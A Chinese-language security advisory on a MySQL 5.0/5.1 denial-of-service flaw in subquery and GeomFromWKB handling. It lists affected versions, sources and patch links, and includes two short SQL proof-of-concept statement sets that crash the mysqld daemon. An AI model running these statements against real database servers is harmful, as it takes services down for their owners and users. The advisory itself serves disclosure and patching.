MySQL SELECT语句处理拒绝服务漏洞

发表评论 (0) 查看评论

受影响系统:

MySQL AB MySQL 5.1.x
MySQL AB MySQL 5.0.x

不受影响系统:

MySQL AB MySQL 5.1.41
MySQL AB MySQL 5.0.88

描述:
MySQL是一款使用非常广泛的开放源代码关系数据库系统,拥有各种平台的运行版本。

MySQL的mysqld守护程序没有正确地处理在执行某些带有子查询的SELECT语句期间所产生的错误,在执行使用GeomFromWKB函数的语句期间没有保留某些null_value标记,这允许通过认证的远程攻击者通过提交特制语句导致守护程序崩溃。

<*来源:Shane Bester
  
  链接:http://secunia.com/advisories/37372/
        http://bugs.mysql.com/bug.php?id=48291
        http://bugs.mysql.com/bug.php?id=47780
        http://bugs.mysql.com/bug.php?id=47780
*>

测试方法:
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

 

drop table if exists `t1`;
create table `t1`(`a` float);
insert into `t1` values (-2),(-1);
select  1 from `t1`
where
`a` <> ‘1’ and not
row(`a`,`a`) <=>
row((select 1 from `t1` where 1=2),(select 1 from `t1`))
into @`var0`;

drop table if exists `t1`;
create table `t1`(`c0` bigint,`c3` multipolygon);
insert into `t1` values
(0,geomfromtext(‘multipolygon(((1 2,3 4,5 6,7 8,9 8),(7 6,5 4,3 2,1 2,3 4)))’));
select 1 from `t1` where
`c0` <>  (select geometrycollectionfromwkb(`c3`) from `t1`);

建议:

厂商补丁:

MySQL AB
——–
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://lists.mysql.com/commits/88409
http://lists.mysql.com/commits/87482

发表评论?

0 条评论。

发表评论